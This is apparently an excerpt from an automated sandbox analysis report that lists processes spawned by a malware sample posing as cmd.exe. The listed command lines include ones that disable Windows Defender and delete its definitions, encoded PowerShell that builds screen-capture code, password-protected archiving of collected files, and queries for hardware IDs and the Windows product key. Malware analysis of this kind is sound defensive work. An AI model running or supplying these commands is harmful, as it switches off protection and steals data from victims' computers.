              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\bcdu5fii\bcdu5fii.cmdline"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\getmac.exe getmac
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES74CA.tmp" "c:\Users\user\AppData\Local\Temp\bcdu5fii\CSC91B7380AF2C2414A909984B12C6688DE.TMP"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exe C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exe a -r -hp"blank" "C:\Users\user\AppData\Local\Temp\DBdXv.zip" *
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic os get Caption
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic computersystem get totalphysicalmemory
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
              Source: C:\Users\user\Desktop\cmd.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend && powershell set-mppreference -submitsamplesconsent 2 & "%programfiles%\windows defender\mpcmdrun.exe" -removedefinitions -all"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend
              Source: C:\Users\user\Desktop\cmd.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaia
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaiab
              Source: C:\Users\user\Desktop\cmd.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend && powershell set-mppreference -submitsamplesconsent 2 & "%programfiles%\windows defender\mpcmdrun.exe" -removedefinitions -all"
              Source: C:\Users\user\Desktop\cmd.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaia
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversendJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaiab
              Source: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exeCode function: 65_2_00007FF69A42B340 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,65_2_00007FF69A42B340
              Source: C:\Users\user\Desktop\cmd.exeCode function: 0_2_00007FF70AF195E0 cpuid 0_2_00007FF70AF195E0
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72642\base_library.zip VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72642\base_library.zip VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72642\base_library.zip VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72642\base_library.zip VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72642\base_library.zip VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72642\base_library.zip VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72642\base_library.zip VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72642\base_library.zip VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72642\base_library.zip VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72642\base_library.zip VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72642\base_library.zip VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72642\base_library.zip VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72642\base_library.zip VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72642\base_library.zip VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72642\base_library.zip VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72642\base_library.zip VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72642\base_library.zip VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72642\base_library.zip VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72642\base_library.zip VolumeInformation
